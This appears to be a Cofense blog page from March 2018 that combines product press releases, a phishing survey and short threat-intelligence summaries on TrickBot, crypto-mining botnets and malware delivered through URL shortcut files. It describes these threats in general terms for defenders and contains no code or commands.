Cofense Pioneers New Phishing Simulation Certification Program for Security Awareness Professionals

Global leader in phishing defense unveils the first-and-only industry certification for phishing simulation programs

LEESBURG, VA – March 29, 2018 – Cofense TM, the leading provider of human-driven phishing defense solutions worldwide, today introduced Cofense PhishMeTM Certification for professionals who administer phishing simulation programs to safeguard their organizations against email-based attacks. Cofense created the phishing simulation industry by launching its Cofense PhishMe solution in 2008. The company continues to pioneer in this market segment by unveiling the first and only phishing simulation certification program of its kind.  

Become the First Security Awareness Professional to be Fully Certified in Phishing Simulation Programs with Cofense

Want to boost your anti-phishing and your professional creds? Now you can, in just a few hours and on your own schedule.

Cofense™  is pleased to announce the Cofense PhishMe™ certification, the industry’s first and only professional certification for phishing simulation programs. It’s your chance to fully master Cofense PhishMe, our award-winning phishing awareness training solution, while becoming a certified expert in phishing simulation programs.

As Mobile Email Access Increases, Cofense™ Introduces Mobile Device Reporting as Latest Innovations in the Fight Against Phishing Threats

Cofense continues to improve the ability to condition employees to phishing attacks and provide the ability to report from anywhere

LEESBURG, VA. – March 28, 2018 – Cofense™, the leading provider of human-driven phishing defense solutions worldwide, today announced product feature innovations to Cofense PhishMe™ and Cofense Reporter™ to better fight the escalating threat of phishing attacks.

Analysing TrickBot Doesn’t Have to be Tricky

New additions to the TrickBot malware’s capabilities, observed by the Phishing Defence Centre, indicate that this malware tool is undergoing active development. The designers of this malware are still working hard to introduce new functionality including a network worm functionality and a screen-lock module. The worm component utilises the leaked “EternalBlue” exploit for CVE-2017-0144 to propagate itself across networks that have yet to patch or discontinue the use of SMBv1. The deployment of the screen-lock module (which appears to be still in the early phases of development) gives the threat actors the ability to change the functionality of the malware from robust banking trojan to a rudimentary ransomware.

Over half of European companies unprepared for email-based cyberattacks

Research shows that European companies receive more suspicious emails than their US counterparts

London, UK – March 27, 2018 – Today Cofense™, the leading provider of human-driven phishing defence solutions worldwide, announced the results of its European-wide Phishing Response Trends Report, which looked at the phishing response strategies of IT security decision-makers across a variety of industries throughout Europe. The report found that 45 percent of European countries are not prepared for a phishing attack, despite 78 percent of IT professionals having dealt with a security incident originating from a deceptive email. This was significantly lower than the 66 percent in the US that had dealt with a similar incident.

Gamers, beware. You are a target for crypto-mining botnets.

Many gamers are unaware that they are either potential targets for mining botnets or that they may already be mining cryptocurrencies for cybercriminals.

Why are gamers targets? Think about it. Mining requires a large graphics card (GPU), a dedicated Internet connection and an uninterrupted power source. Gamers use powerful and immersive, high-performing GPU’s to stay online and play networked games without interruption. It’s the perfect recipe for crypto mining.

The Latest in Software Functionality Abuse: URL Internet Shortcut Files Abused to Deliver Malware

Adding to a growing trend of phishing attacks wherein Windows and Office functionalities are abused to compromise victim systems, Cofense Intelligence™ has analyzed a recent campaign that uses the URL file type to deliver subsequent malware payloads. This file type is similar to a Windows LNK shortcut file (both file types share the same global object identifier within Windows) and can be used as a shortcut to online locations or network file shares. These files may abuse built-in functionality in Windows to enhance the ability of an attacker to deliver malware to endpoints.

By abusing these built-in functionalities, threat actors can complicate detection and mitigation in these scenarios, because the software is behaving exactly as it was designed to. The proliferation of abuse techniques indicates that threat actors may be increasingly prioritizing the use of such methodologies due to detection difficulties.

The emails analyzed by Cofense Intelligence include a nondescript phishing campaign that informs recipients of an attached bill, receipt, or invoice. The analysis performed for Threat ID 10993 focused on emails that deliver attached URL shortcut files with their target resource identified using the “file://” scheme. Windows environments use this scheme to denote a file resource that is on the hard drive or hosted on a network file share.

However, the target for these Uniform Resource Identifiers (URIs) can also be a remote resource. When a URL shortcut file is written to disk, Windows will attempt to validate the target denoted by the “file://” scheme. If validated, the remote resource can be downloaded to the local machine. The use of this file format and URI scheme may indicate that threat actors seek to abuse the resource resolution functionality associated with these shortcut files to deliver malware onto victims’ machines at the time the URL file is extracted from a Zip archive.

Figure 1 – URL shortcut files can reference remote file shares to deliver malware

During our analysis, there was no evidence that the downloaded JavaScript application can be run without user interaction. However, once the script application is executed, the infection process continues with the subsequent download and execution of the Quant Loader malware downloader. Quant Loader, in turn, runs a sample of the Ammyy Admin remote desktop administration software that is being repurposed as an effective remote access trojan by these attackers.

Figure 2 – Downloading a payload over SMB is a less-common method for malware delivery

This technique showcases yet another method in which commonplace Windows features are abused by threat actors, adding to the expanding set of delivery applications crafted to distribute malware.

The nature of these files reveals the risk involved with applications that obtain files simply by issuing connection requests without user interaction. Incident responders and network defenders must devise a response plan to address this scenario, especially if enterprises and organizations operate on a Windows environment. This campaign also demonstrates that as threat actors develop new attack methodologies, more emails are likely to reach user inboxes. Therefore, it is crucial that those users can identify and report such campaigns, because they are the final line of defense at that point.

Sign up for free threat alerts. Get phishing and malware trends delivered to your inbox: https://cofense.com/threat-alerts/